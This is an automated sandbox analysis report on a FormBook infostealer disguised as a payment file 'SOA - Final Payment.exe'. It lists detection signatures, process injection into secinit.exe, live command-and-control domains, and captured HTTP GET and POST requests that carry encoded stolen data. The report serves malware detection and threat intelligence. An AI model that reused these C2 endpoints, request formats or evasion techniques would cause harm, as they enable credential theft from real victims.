Windows Analysis Report
SOA - Final Payment.exe

Overview

General Information

Sample name:SOA - Final Payment.exe
Analysis ID:1612352
MD5:070cf235938777838e7c55c9f0c02993
SHA1:e32f0362867403655ca9ba219b40d453fd9ad096
SHA256:004d0b8aa2bc2236e124fceddc2ef21c091678fc622d6bce5ed02292b0b971e4
Tags:exe, user-abuse_ch

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SOA - Final Payment.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\SOA - Final Payment.exe" MD5: 070CF235938777838E7C55C9F0C02993)
    • SOA - Final Payment.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\SOA - Final Payment.exe" MD5: 070CF235938777838E7C55C9F0C02993)
    • SOA - Final Payment.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\SOA - Final Payment.exe" MD5: 070CF235938777838E7C55C9F0C02993)
    • SOA - Final Payment.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\SOA - Final Payment.exe" MD5: 070CF235938777838E7C55C9F0C02993)
      • 6UCrnFl0sVXS7jZvJ.exe (PID: 6728 cmdline: "C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\QTRArnsBh.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • secinit.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\secinit.exe" MD5: 3B4B8DB765C75B8024A208AE6915223C)
          • 6UCrnFl0sVXS7jZvJ.exe (PID: 3332 cmdline: "C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\OxrzgCNXBfF.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 8188 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.2602456510.0000000002A50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.2603116280.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1730940118.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1733251033.0000000001590000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.2605626950.0000000002F70000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
5.2.SOA - Final Payment.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.SOA - Final Payment.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched
No Suricata rule has matched


AV Detection

                Source: http://www.bydotoparca.net, Avira URL Cloud: Label: malware
                Source: http://www.bydotoparca.net/s3u9/?4J=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEmvApV4bOCL+NdTgdCFBJIAA/S51Hhw==&pd=qdUp, Avira URL Cloud: Label: malware
                Source: http://www.physicsbrain.xyz/i9o2/?4J=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lsp5mJoJ4HYPoeUMJkyf7J+YlHSS38A==&pd=qdUp, Avira URL Cloud: Label: malware
                Source: SOA - Final Payment.exe, Virustotal: Detection: 62%
                Source: SOA - Final Payment.exe, ReversingLabs: Detection: 59%
                Source: Yara match, File source: 5.2.SOA - Final Payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SOA - Final Payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000A.00000002.2602456510.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.2603116280.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1730940118.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1733251033.0000000001590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.2605626950.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1733539171.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.2605336113.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: SOA - Final Payment.exe, Joe Sandbox ML: detected
                Source: SOA - Final Payment.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SOA - Final Payment.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: secinit.pdbGCTL source: SOA - Final Payment.exe, 00000005.00000002.1731361843.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2603955598.00000000009DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: SOA - Final Payment.exe, 00000005.00000002.1731725620.0000000001240000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1731171296.0000000003004000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.0000000003360000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1733240838.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SOA - Final Payment.exe, SOA - Final Payment.exe, 00000005.00000002.1731725620.0000000001240000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, secinit.exe, 0000000A.00000003.1731171296.0000000003004000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.0000000003360000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1733240838.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: secinit.pdb source: SOA - Final Payment.exe, 00000005.00000002.1731361843.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2603955598.00000000009DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655110436.000000000050F000.00000002.00000001.01000000.0000000C.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2602458312.000000000050F000.00000002.00000001.01000000.0000000C.sdmp
                Source: C:\Windows\SysWOW64\secinit.exe, Code function: 10_2_02A6C750 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\secinit.exe, Code function: 4x nop then xor eax, eax (10_2_02A59EA0)
                Source: C:\Windows\SysWOW64\secinit.exe, Code function: 4x nop then mov ebx, 00000004h (10_2_031804E8)

Networking

                Source: DNS query: www.physicsbrain.xyz
                Source: Joe Sandbox View, IP Address: 13.248.169.48
                Source: Joe Sandbox View, IP Address: 85.159.66.93
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic, HTTP traffic detected: GET /i9o2/?4J=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lsp5mJoJ4HYPoeUMJkyf7J+YlHSS38A==&pd=qdUp HTTP/1.1
                    Host: www.physicsbrain.xyz
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US
                    Connection: close
                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global traffic, HTTP traffic detected: GET /s3u9/?4J=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEmvApV4bOCL+NdTgdCFBJIAA/S51Hhw==&pd=qdUp HTTP/1.1
                    Host: www.bydotoparca.net
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US
                    Connection: close
                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global traffic, DNS traffic detected: DNS query: www.physicsbrain.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.bydotoparca.net
                Source: unknownHTTP traffic detected: POST /s3u9/ HTTP/1.1Host: www.bydotoparca.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USOrigin: http://www.bydotoparca.netCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 191Connection: closeReferer: http://www.bydotoparca.net/s3u9/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)Data Raw: 34 4a 3d 5a 78 4c 69 52 69 71 6e 65 39 4a 77 4b 35 57 2b 49 4a 4d 6d 46 46 6c 79 57 6a 49 45 79 68 36 64 53 57 2b 6c 35 72 51 6f 6a 48 76 62 64 50 2f 6a 6e 2f 57 59 75 72 2b 54 68 32 38 78 53 79 2b 67 76 67 6f 53 71 61 72 68 67 49 51 6a 42 55 79 35 42 6f 66 53 6e 39 6f 73 4a 35 36 52 49 2f 4f 4a 51 51 63 58 65 56 64 43 61 41 55 49 58 49 78 50 37 31 73 55 32 6e 37 62 4b 61 70 72 32 5a 44 30 30 6a 6c 6b 49 68 59 42 56 46 75 2f 68 54 52 34 79 57 75 42 73 38 35 59 50 34 6b 7a 34 52 50 41 6e 62 2b 41 74 36 39 74 42 6e 69 52 50 78 46 52 61 6a 2b 57 39 74 47 6c 69 58 51 34 Data Ascii: 4J=ZxLiRiqne9JwK5W+IJMmFFlyWjIEyh6dSW+l5rQojHvbdP/jn/WYur+Th28xSy+gvgoSqarhgIQjBUy5BofSn9osJ56RI/OJQQcXeVdCaAUIXIxP71sU2n7bKapr2ZD00jlkIhYBVFu/hTR4yWuBs85YP4kz4RPAnb+At69tBniRPxFRaj+W9tGliXQ4
                Source: 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2608255794.0000000004FC0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bydotoparca.net
                Source: 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2608255794.0000000004FC0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bydotoparca.net/s3u9/
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: secinit.exe, 0000000A.00000003.1927763336.0000000007B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

                Source: Yara match, File source: 5.2.SOA - Final Payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SOA - Final Payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000A.00000002.2602456510.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.2603116280.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1730940118.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1733251033.0000000001590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.2605626950.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1733539171.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.2605336113.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

                Source: initial sample, Static PE information: Filename: SOA - Final Payment.exe
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0042CB93 NtClose,5_2_0042CB93
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B35C0 NtCreateMutant,LdrInitializeThunk,5_2_012B35C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2B60 NtClose,LdrInitializeThunk,5_2_012B2B60
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_012B2DF0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_012B2C70
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B3010 NtOpenDirectoryObject,5_2_012B3010
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B3090 NtSetValueKey,5_2_012B3090
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B4340 NtSetContextThread,5_2_012B4340
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B4650 NtSuspendThread,5_2_012B4650
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B39B0 NtGetContextThread,5_2_012B39B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2BA0 NtEnumerateValueKey,5_2_012B2BA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2B80 NtQueryInformationFile,5_2_012B2B80
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2BE0 NtQueryValueKey,5_2_012B2BE0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2BF0 NtAllocateVirtualMemory,5_2_012B2BF0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2AB0 NtWaitForSingleObject,5_2_012B2AB0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2AF0 NtWriteFile,5_2_012B2AF0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2AD0 NtReadFile,5_2_012B2AD0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2D30 NtUnmapViewOfSection,5_2_012B2D30
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2D00 NtSetInformationFile,5_2_012B2D00
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2D10 NtMapViewOfSection,5_2_012B2D10
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B3D10 NtOpenProcessToken,5_2_012B3D10
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B3D70 NtOpenThread,5_2_012B3D70
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2DB0 NtEnumerateKey,5_2_012B2DB0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2DD0 NtDelayExecution,5_2_012B2DD0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2C00 NtQueryInformationProcess,5_2_012B2C00
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2C60 NtCreateKey,5_2_012B2C60
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2CA0 NtQueryInformationToken,5_2_012B2CA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2CF0 NtOpenProcess,5_2_012B2CF0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2CC0 NtQueryVirtualMemory,5_2_012B2CC0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2F30 NtCreateSection,5_2_012B2F30
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2F60 NtCreateProcessEx,5_2_012B2F60
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2FA0 NtQuerySection,5_2_012B2FA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2FB0 NtResumeThread,5_2_012B2FB0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2F90 NtProtectVirtualMemory,5_2_012B2F90
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2FE0 NtCreateFile,5_2_012B2FE0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2E30 NtWriteVirtualMemory,5_2_012B2E30
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2EA0 NtAdjustPrivilegesToken,5_2_012B2EA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2E80 NtReadVirtualMemory,5_2_012B2E80
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2EE0 NtQueueApcThread,5_2_012B2EE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D4340 NtSetContextThread,LdrInitializeThunk,10_2_033D4340
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D4650 NtSuspendThread,LdrInitializeThunk,10_2_033D4650
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2B60 NtClose,LdrInitializeThunk,10_2_033D2B60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_033D2BA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_033D2BF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_033D2BE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2AF0 NtWriteFile,LdrInitializeThunk,10_2_033D2AF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2AD0 NtReadFile,LdrInitializeThunk,10_2_033D2AD0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2F30 NtCreateSection,LdrInitializeThunk,10_2_033D2F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2FB0 NtResumeThread,LdrInitializeThunk,10_2_033D2FB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2FE0 NtCreateFile,LdrInitializeThunk,10_2_033D2FE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_033D2E80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2EE0 NtQueueApcThread,LdrInitializeThunk,10_2_033D2EE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_033D2D30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_033D2D10
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_033D2DF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2DD0 NtDelayExecution,LdrInitializeThunk,10_2_033D2DD0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_033D2C70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2C60 NtCreateKey,LdrInitializeThunk,10_2_033D2C60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_033D2CA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D35C0 NtCreateMutant,LdrInitializeThunk,10_2_033D35C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D39B0 NtGetContextThread,LdrInitializeThunk,10_2_033D39B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2B80 NtQueryInformationFile,10_2_033D2B80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2AB0 NtWaitForSingleObject,10_2_033D2AB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2F60 NtCreateProcessEx,10_2_033D2F60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2FA0 NtQuerySection,10_2_033D2FA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2F90 NtProtectVirtualMemory,10_2_033D2F90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2E30 NtWriteVirtualMemory,10_2_033D2E30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2EA0 NtAdjustPrivilegesToken,10_2_033D2EA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2D00 NtSetInformationFile,10_2_033D2D00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2DB0 NtEnumerateKey,10_2_033D2DB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2C00 NtQueryInformationProcess,10_2_033D2C00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2CF0 NtOpenProcess,10_2_033D2CF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2CC0 NtQueryVirtualMemory,10_2_033D2CC0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D3010 NtOpenDirectoryObject,10_2_033D3010
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D3090 NtSetValueKey,10_2_033D3090
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D3D10 NtOpenProcessToken,10_2_033D3D10
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D3D70 NtOpenThread,10_2_033D3D70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A79240 NtCreateFile,10_2_02A79240
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A793A0 NtReadFile,10_2_02A793A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A79690 NtAllocateVirtualMemory,10_2_02A79690
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A79490 NtDeleteFile,10_2_02A79490
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A79530 NtClose,10_2_02A79530
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0318F980 NtSetContextThread,10_2_0318F980
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040E5C35_2_0040E5C3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004105D35_2_004105D3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004025825_2_00402582
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004025905_2_00402590
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00402F405_2_00402F40
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040E75C5_2_0040E75C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040276A5_2_0040276A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004027705_2_00402770
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040E7125_2_0040E712
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040E7135_2_0040E713
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00402F3D5_2_00402F3D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012701005_2_01270100
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131A1185_2_0131A118
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B516C5_2_012B516C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F1725_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0134B16B5_2_0134B16B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013081585_2_01308158
